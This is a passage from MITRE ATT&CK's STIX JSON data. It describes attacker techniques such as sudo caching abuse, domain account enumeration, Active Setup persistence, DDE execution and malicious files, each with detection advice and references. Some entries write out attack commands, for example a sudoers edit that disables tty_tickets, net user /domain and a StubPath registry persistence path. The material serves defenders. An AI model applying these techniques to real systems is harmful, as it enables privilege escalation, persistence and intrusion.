Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["ESET"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "created": "2023-03-28T20:14:49.087Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1652", "external_id": "T1652"}, {"source_name": "lsmod man", "description": "Kerrisk, M. (2022, December 18). lsmod(8) \u2014 Linux manual page. Retrieved March 28, 2023.", "url": "https://man7.org/linux/man-pages/man8/lsmod.8.html"}, {"source_name": "Microsoft Registry Drivers", "description": "Microsoft. (2021, December 14). Registry Trees for Devices and Drivers. Retrieved March 28, 2023.", "url": "https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys"}, {"source_name": "Microsoft EnumDeviceDrivers", "description": "Microsoft. (2021, October 12). EnumDeviceDrivers function (psapi.h). Retrieved March 28, 2023.", "url": "https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers"}, {"source_name": "Microsoft Driverquery", "description": "Microsoft. (n.d.). driverquery. Retrieved March 28, 2023.", "url": "https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery"}, {"source_name": "Linux Kernel Programming", "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"}, {"source_name": "modinfo man", "description": "Russell, R. (n.d.). modinfo(8) - Linux man page. Retrieved March 28, 2023.", "url": "https://linux.die.net/man/8/modinfo"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Sudo Caching", "description": "The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\" (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout that is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nAdversaries can abuse poor configurations of this to escalate privileges without needing the user's password. /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. When tty_tickets is disabled, adversaries can do this from any tty for that user. \n\nThe OSX Proton Malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2169ba87-1146-4fc7-a118-12b72251db7e", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1206", "external_id": "T1206"}, {"source_name": "sudo man page 2018", "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", "url": "https://www.sudo.ws/"}, {"source_name": "cybereason osx proton", "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-15T21:33:57.732Z", "name": "Domain Account", "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["ExtraHop", "Miriam Wiesner, @miriamxyra, Microsoft Security"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "created": "2020-02-21T21:08:26.480Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1087/002", "external_id": "T1087.002"}, {"source_name": "CrowdStrike StellarParticle January 2022", "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Active Setup", "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", "created": "2020-12-18T16:33:13.098Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/014", "external_id": "T1547.014"}, {"source_name": "SECURELIST Bright Star 2015", "description": "Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who\u2019s Really Spreading through the Bright Star?. Retrieved December 18, 2020.", "url": "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/"}, {"source_name": "Mandiant Glyer APT 2010", "description": "Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.", "url": "https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf"}, {"source_name": "FireEye CFR Watering Hole 2012", "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html"}, {"source_name": "Klein Active Setup 2010", "description": "Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.", "url": "https://helgeklein.com/blog/2010/04/active-setup-explained/"}, {"source_name": "paloalto Tropic Trooper 2016", "description": "Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.", "url": "https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Citizenlab Packrat 2015", "description": "Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.", "url": "https://citizenlab.ca/2015/12/packrat-report/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-29T17:45:48.126Z", "name": "Hide Artifacts", "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "created": "2020-02-26T17:41:25.933Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564", "external_id": "T1564"}, {"source_name": "Cybereason OSX Pirrit", "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"}, {"source_name": "MalwareBytes ADS July 2015", "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}, {"source_name": "Sophos Ragnar May 2020", "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.", "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Role Identification", "description": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.\n\nFor example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Human-Machine Interface", "Control Server", "Data Historian", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0850", "external_id": "T0850"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-15T18:57:21.881Z", "name": "Dynamic Data Exchange", "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )\n\nDDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\n\nOLE, Office Open XML, CSV, and other files can be scanned for \u2018DDEAUTO', \u2018DDE\u2019, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "created": "2020-02-12T14:10:50.699Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1559/002", "external_id": "T1559.002"}, {"source_name": "OWASP CSV Injection", "description": " Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.", "url": "https://owasp.org/www-community/attacks/CSV_Injection"}, {"source_name": "CSV Excel Macro Injection ", "description": " Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.", "url": "https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/"}, {"source_name": "BleepingComputer DDE Disabled in Word Dec 2017", "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/"}, {"source_name": "SensePost PS DDE May 2016", "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.", "url": "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/"}, {"source_name": "Fireeye Hunting COM June 2019", "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"}, {"source_name": "Kettle CSV DDE Aug 2014", "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", "url": "https://www.contextis.com/blog/comma-separated-vulnerabilities"}, {"source_name": "Microsoft ADV170021 Dec 2017", "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", "url": "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021"}, {"source_name": "Microsoft DDE Advisory Nov 2017", "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", "url": "https://technet.microsoft.com/library/security/4053440"}, {"source_name": "Enigma Reviving DDE Jan 2018", "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", "url": "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee"}, {"source_name": "NVisio Labs DDE Detection Oct 2017", "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", "url": "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/"}, {"source_name": "SensePost MacroLess DDE Oct 2017", "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", "url": "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-21T12:22:19.740Z", "name": "Malicious File", "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["TruKno"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "created": "2020-03-11T14:49:36.954Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1204/002", "external_id": "T1204.002"}, {"source_name": "Password Protected Word Docs", "description": "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.", "url": "https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Identify Business Tempo", "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization\u2019s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim\u2019s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", "created": "2020-10-02T16:34:32.435Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1591/003", "external_id": "T1591.003"}, {"source_name": "ThreatPost Broadvoice Leak", "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Security Software Discovery", "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows"], "x_mitre_version": "2.1", "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "created": "2017-05-31T21:30:51.330Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1063", "external_id": "T1063"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Hardware", "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or 